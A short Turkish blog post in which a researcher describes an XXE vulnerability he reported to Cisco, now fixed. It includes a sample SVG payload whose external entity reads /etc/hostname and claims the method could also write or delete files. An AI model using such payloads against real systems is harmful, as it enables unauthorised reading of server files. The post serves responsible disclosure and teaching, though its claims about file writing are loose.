|

Cisco'da Bulduğum ZafiyetAli Can Gönüllü tarafından 2023-03-14 15:04:36 tarihinde yazıldı. Tahmini okunma süresi 1 dakika, 12 saniye.Çalışmalarım için bağış yapmak isterseniz Patreon hesabımdan bağışta bulunabilirsiniz.

Blog adresinde yazılanlar sadece eğitim amacıyla deneysel olarak hazırlanmıştır. Konu içerisinde geçen yöntemleri kendi oluşturduğunuz test ortamında denemenizi tavsiye ederiz.
Herhangi bir tarih, yer ve/veya mekanda oluşacak zararlardan alicangonullu.org, alicangonullu.org yöneticisi ve/veya konu yazarı mesul değildir.

Merhabalar,

Bu yazımda sizlere yaklaşık üç ay önce bulduğum ve 20 Şubat itibarıyla çözülen Cisco zafiyetinden bahsedeceğim. Bu zafiyet ile birlikte Cisco'ya ait olan Hall of Fame listesine girmeye hak kazandım.

Öncelikle bahsetmemiz gereken şey XXE Enjeksiyonu konusu olacaktır.

XXE Enjeksiyonu

XXE Enjeksiyonu kısaca, sisteme XML, SVG ve benzeri bir formatla yüklenen dosyalar üzerinden komut ve/veya kod enjeksiyonu yapabileceğiniz bir zafiyet çeşididir. Cisco'da bulduğum zafiyette bunun bir benzerini içermektedir.

Zafiyetin Uygulanması

Güvenlik amacıyla sadece SVG dosyasının bir benzerini vereceğim,

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg> 

Örnek ekran görüntüsü

Bu aşamada sadece bir JavaScript kodunu içeriye aktardım fakat dosya sistemini bildiğiniz takdirde içeriye dosya okuma, yazma ve/veya silme komutları da gönderebilirsiniz.